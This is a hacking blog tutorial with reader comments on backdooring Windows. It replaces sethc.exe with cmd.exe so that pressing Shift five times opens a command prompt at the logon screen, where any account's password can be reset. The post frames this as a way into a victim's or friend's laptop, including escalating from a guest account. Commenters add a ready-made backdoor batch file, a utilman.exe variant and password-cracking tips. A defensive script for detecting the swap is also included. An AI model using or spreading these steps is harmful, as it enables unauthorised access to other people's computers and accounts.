Let's assume that you have just cracked a victim's Windows password, or simply got access to his Windows machine for some time. Can you make some changes in Windows so that you could access it again even if the victim changes the password? Or can you make changes in your own Windows so that you could access it anytime, even if anybody sets or changes the password?
Simply put, can we set a backdoor in Windows?
Yes we can :)
A backdoor actually means maintaining access.
Okay, let's do one thing first. Open your command prompt (run as administrator in Win 7/Vista).

Type the following command :

Syntax : net user account.name *
Example: net user administrator *
and hit enter. Set any password for that account.



Hopefully your new password has been set. Did you notice one thing? It didn't ask you to confirm the old password. Now suppose we somehow manage to access the command prompt at the logon screen (without logging in): we can easily change or clear the password.
Okay, let's move on.
Now press the Shift key five times and you should get a "Sticky Keys" dialog box on screen.

Sticky Keys is a feature that makes it easy for users who have physical disabilities to press multiple keys at a time. This is the only feature which can be used before logging in at the logon screen (as per my knowledge). I repeat: this feature can be used at the logon screen by pressing the Shift key five times.
Whenever we start an application like Paint, we are actually running mspaint.exe placed in C:\windows\system32. For the command prompt, we are running cmd.exe placed in the system32 directory. Similarly, when we press the Shift key 5 times or use the Sticky Keys feature, the system actually starts the executable file sethc.exe placed in the system32 directory. This means if we rename cmd.exe to sethc.exe and press Shift 5 times, the system would again start sethc.exe, but instead of Sticky Keys the command prompt will be opened.
But you can't simply rename it or change system32 files. Follow the tutorial for that.

 Tutorial :


* Go to C:\windows\system32
* Copy cmd.exe to your desktop and rename it to sethc.exe.
* Now copy that file and paste it back into the system32 directory.

@ Windows XP Users


Hopefully the existing original sethc.exe has been replaced and your job is done. Now press Shift five times and you would see the command prompt on screen. You can access the command prompt at the Windows logon screen and change or clear the password easily using the "net user" command.

Note: You can also make these changes while using the Windows Guest account. But when you access the command prompt at the logon screen, you can change or clear the password even of the administrator's account. This is exactly how we can hack into the administrator's account through the guest account.

@ Windows vista/7 Users


You must have got a pop up box saying "Access Denied".


Actually, you cannot change system32 directory files unless you have the permissions. You cannot have the permissions unless you have the ownership. So let's take ownership and change permissions; just follow the steps.

1. Right click on sethc.exe and run as administrator. Again right click on sethc.exe and open Properties. Click on the Advanced tab, then on Owner, and click Edit. Change the owner from "trusted installer" to "administrator" and click Apply.

2. Then click on 'Edit' in the Security tab to edit permissions. Click on 'Administrators', give it full control and apply the changes.

Okay, it's done now.

Now try replacing the original sethc.exe with our sethc.exe (got by renaming cmd.exe).
Press the Shift key five times and hopefully you would get the command prompt on the screen instead of Sticky Keys.

Enjoy the command prompt at the logon screen...

So do not forget to set this backdoor whenever you get a friend's laptop for a few minutes... :)
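
One way to check a machine for the swap described in this post, as an added example that is not code from the original post: it flags sethc.exe (and utilman.exe, the variant a commenter mentions) when the file is byte-identical to cmd.exe, reports a different original filename, or is no longer owned by TrustedInstaller. The function name `Test-LogonAccessibilityBinary` is hypothetical, and the owner check assumes Windows Vista or later.

```powershell
# Added example: audit the logon-screen accessibility binaries for the swap described above.
# Assumes Windows Vista or later (TrustedInstaller ownership) and PowerShell 4+ (Get-FileHash).
function Test-LogonAccessibilityBinary {
    param(
        [string]$System32 = (Join-Path $env:SystemRoot 'System32'),
        # sethc.exe is the article's target; utilman.exe is the variant a commenter mentions.
        [string[]]$Names = @('sethc.exe', 'utilman.exe')
    )
    $cmdHash = (Get-FileHash -Algorithm SHA256 -LiteralPath (Join-Path $System32 'cmd.exe')).Hash

    foreach ($name in $Names) {
        $path = Join-Path $System32 $name
        if (-not (Test-Path -LiteralPath $path)) {
            [pscustomobject]@{ File = $name; Finding = 'missing'; Detail = $path }
            continue
        }
        $findings = @()

        # 1. Same bytes as cmd.exe: the exact replacement the tutorial performs.
        $hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash
        if ($hash -eq $cmdHash) { $findings += 'identical to cmd.exe' }

        # 2. Version resource names another program. Prefix match, because newer
        #    Windows builds can report the name with a ".MUI" suffix.
        $orig = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
        if ($orig -notlike "$name*") { $findings += "OriginalFilename is '$orig'" }

        # 3. Owner changed away from TrustedInstaller (step 1 of the Vista/7 procedure).
        $owner = (Get-Acl -LiteralPath $path).Owner
        if ($owner -ne 'NT SERVICE\TrustedInstaller') { $findings += "owner is '$owner'" }

        [pscustomobject]@{
            File    = $name
            Finding = if ($findings) { 'SUSPICIOUS' } else { 'ok' }
            Detail  = ($findings -join '; ')
        }
    }
}

Test-LogonAccessibilityBinary | Format-Table -AutoSize
```

Running `sfc /scannow` from an elevated prompt restores a flagged file from the protected system copy; the ownership and permission changes on the file should be reviewed separately.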

58 comments:

  1. done and accomplish!!!:D
    but is there anyways to log in without changing the owner password???

  2. For that , we would have to crack his existing password using live CDs. Read more here
    http://www.explorehacking.com/2011/01/windows-logon-password-how-crackers.html

  3. u mean using ophcrack right???
    i have tried on some place n it really works...
    but unfortunately it doesn't work on my laptop...
    why is it??

  4. Yeah, oph crack. I have used this a few times and it has worked for me. I can't say why it didn't work on your laptop. Did you get any error or what?

  5. when i used oph crack i didn't get exact passwords which are saved... actually i used it on my own lappi... but it showed some random passwords like WuHJJJ57KKKpld.... and many such things... i used KRYPTON based oph crack cd

  6. does not work for me ........
    i followed all the steps mentioned by u....
    i replaced sethc.exe but still m able to use sticky keys... i.e cmd doesnot pop out .... m using xp

  7. Hi, i have a problem. whenever i try to give new password, an error comes,
    saying..........
    "c:\windows\system32>net user administrator *
    type a password for the user:(i tried to type the password but it was not showing the values)
    retype the password to confirm:
    system error 5 has occured.

    Access is denied."

  8. @anonymous, mention query in detail

    @Mit Run command prompt as administrator. "Run as administrator"

  9. does not work for me too ........
    i followed all the steps mentioned by u....
    still i could not replace the original sethc.exe file with the new one(the cmd.exe renamed) on windows 7 home basic

  10. nice starting dude.. Now start some real thing like tutorials on win32 exploit writing and so on

  11. Do you have to delete the original sethc.exe on Vista when you rename and paste the cmd.exe (now called sethc.exe)into \system32? Or does it automatically get overwritten by the cmd version?

    Cheers in advance.

  12. On Vista do you have to delete the original sethc.exe after pasting the cmd version into \system32 or is it automatically overwritten?

  13. JHV

  14. that's a crap...if we will have the privilege to change the permission then no need to hack the machine ...dude....tell me how to crack the admin account if only guest account is allowed and that too is parental controlled

  15. how can i change when i dont have administrative privilege

  16. This comment has been removed by the author.
  17. You can not do this through a guest account in Win 7. Its possible only in win XP.

  18. hi even i'm facing the same problem as mit run...when i type the password & press enter..it says "access is denied...system error 5 has occurred".

    i didnt understand what you meant by Run command prompt as administrator. "Run as administrator".. please can you explain how to do it?

    thanks a lot..

  19. works like a charm!! nice work!! :) thanks :D

  20. Fantastic.. :D


    worked for me... thank you.. i want this today and got it here.. thnks

  21. nice job. but can do it more wisely...

  22. i am having problems copying the new sethc.exe into sys32 folder it says 'access is denied make sure the disk is not full or write protected and the file is currently in use' so what should i do?

  23. awsome 4 me wrkd first time very clever man

  24. thank for your valuable information.I have implemented it and got the desired result..

  25. "does not work for me ........
    i followed all the steps mentioned by u....
    i replaced sethc.exe but still m able to use sticky keys... i.e cmd doesnot pop out .... m using xp"
    - make sure that if your file extension is hidden, you don't add the .exe i.e. just rename it as sethc

  26. Not working for........... i m unable to copy sethc file on original sethc file......... on win 7 ultimate.

  27. nice..
    to learn more about windows hacking,web hacking cyber security visit my blog at
    www.almashackingtutorials.blogspot.com

  28. Hurrey...those who r facing problem specially in win7 contact me admin@techalexa.com ...I got it.can help u by email

  29. I am unable to do this for a user account with some name like Sai Teja and the error it is showing is "
    "
    C:\Documents and Settings\Sai>net user Sai Teja *
    The syntax of this command is:


    NET USER
    [username [password | *] [options]] [/DOMAIN]
    username {password | *} /ADD [options] [/DOMAIN]
    username [/DELETE] [/DOMAIN]
    "

    Can u tell me what should I do for this ?

  30. after getting cmd on logon screen how to log in to s/m??

  31. after getting cmd on logon screen how to log in to s/m

  32. Hey dear users, my command prompt is disabled and does not recover through anything. i have scanned with many antiviruses but it does not work, so what can I do to retain it! :s

    and do u hear of this malware malware-win32.classid-61348

  33. after cmd prompt on screen just type
    net user // to see usernames
    net user < name > *

    and enter password which will not show u but u can enter

  34. cd\
    c:
    cd windows
    cd system32
    copy cmd.exe d:
    this is bat file to make backdoor in XP copy it-

    cd\
    d:
    ren cmd.exe sethc.exe
    c:
    cd\
    cd windows
    cd system32
    ren sethc.exe my.exe
    cd\
    d:
    copy sethc.exe C:\Windows\System32
    @echo Backdoor have been Created
    @echo on
    @echo You can change it By same commands as net user administrator *
    pause

    and save it as backdoor.bat works in Xp only

  35. I am unable to do this for a user account with some name like Sai Teja and the error it is showing is "
    "
    C:\Documents and Settings\Sai>net user Sai Teja *
    The syntax of this command is:


    NET USER
    [username [password | *] [options]] [/DOMAIN]
    username {password | *} /ADD [options] [/DOMAIN]
    username [/DELETE] [/DOMAIN]
    "

    Can u tell me what should I do for this ?

  36. Hi
    I got the 'command successfully completed' thing on the command prompt after changing the password. but when I log into the account, I still have to use the old password. Why is that? O.o
    And also I am not able to open command prompt from login screen. Did all the above step, but it just opens the sticky keys window.

  37. What if i want to login a computer whose password is not known by me, and no one has replaced the sethc.exe file in the computer

  38. hi very good tut thanks bro

    how to see r find the windows admin password without help of any software or cd..i jst want to do that by dos

  39. DON'T USE the method if it doesn't work for you guys..
    the best way is to use ophcrack cd or usb method..
    wait for my tutorials about that on pctionary

  40. if i do this with notepad instead of cmd, or even if i use cmd, it will close after a set amount of time. This will happen with anyprogram running on login screen after a while, they will all close at the same time. why is this? i want to run virtual machine software this way, but it closes after about five minuets

  41. my younger sister while fiddling with the administrator account changed its password and forgot...now all i have is a regular account and no access to the admin. account....i would have reinstalled windows but i have very imp files stored in my admin account and the problem worsens when i cant insert a cd as it is net book!!!! plzzz help and save my life!! -samantha

  42. "my younger sister while fiddling with the administrator account changed its password and forgot...now all i have is a regular account and no access to the admin. account...."

    You can try ophcrack but i think that the best way is to download "NT Offline pasword and Registry editor cd" and remove the password. Use that tool only if you have NOT used disk encryption, because if you have encrypted files and do not get the right password you lose your files! That is a free program (boot cd) and Google will help you to find it ;-)

  43. @samantha download a linux iso image and install it to usb, that's what i did for my sister's laptop when it crashed. use xboot (requires .net framework) to install the iso to a flash drive of some kind. use that to replace sethc.exe in the c:\windows\system32 folder with cmd.exe in the same folder, then when you log in press shift five times and command prompt will pop up.... The command for password replacement is "net user {{insert username without curly braces}} {{insert new password}}". if i left something out just tell me darthearon@yahoo.com. hope i can be of service (same guy who posted right before you, so if anybody can help with my issue it would be very helpful)

  44. ok went to this blog looking for a different thing and to the without changing password this way he said here u have to have access to the machine so why not just use opcrack and with that method he said , why not when u pull up cmd at the login however u have that set up i usually do the windows u utilman.exe replacement type explorer and pull up the systems desktop

  45. @anonymous

    "Run as Administrator" is done by right clicking the cmd app and selecting the Run as Administrator option.

  46. Not working for me. i m unable to copy sethc file on original sethc file......... on win 7 ultimate.

  47. i'm unable to change it's permission into administrator..

    that's it.

  48. i cannot change my password! after writing
    ner user my-username *
    it let me type a password. after confirming the password it causes an error, that is:

    "System error 5 has occurred.
    Access is denied.
    c:\User\Moinul>"

    now what should I do? please any of you give me the solution plzzzzzzzzzzzzzz plzzzzzzzzzzzzz..

  49. cool hack, although I used Unlocker instead of messing with the permissions.

    1) Copy "sethc.exe" to "sethc.bak"

    2) Use Unlocker to delete original "sethc.exe"

    3) Copy "cmd.exe" to "sethc.exe"

    4) Logout

    5) Tap "Shift" 5 times

    6) once inside CMD prompt, type "start cmd" to bring up a TRUE Administrator prompt.

    7) Have Fun :)

  50. alright im the admin on my pc but when i try to give myself full control i get access denied whats going on?

  51. NICE ONE SIR! :D

  52. thanx..!!!

  53. hi thanks for you tutorial
    but it still keep saying
    system error 5 has occured ...
    what could be the problem?

  54. This is an awesome trick btw. I would also suggest that you keep a copy of sticky keys application in a folder in System in case you want to revert back to original sethc.exe. I don't know why anyone would want to, but you never know. :-)

  55. How did u change it. Mine keeps doing the same message. I cant fix it help please please

  56. I need help with same problem. Please help me

  57. How did u change it. Mine keeps doing the same message. I cant fix it help please please

  58. please reupload all the images
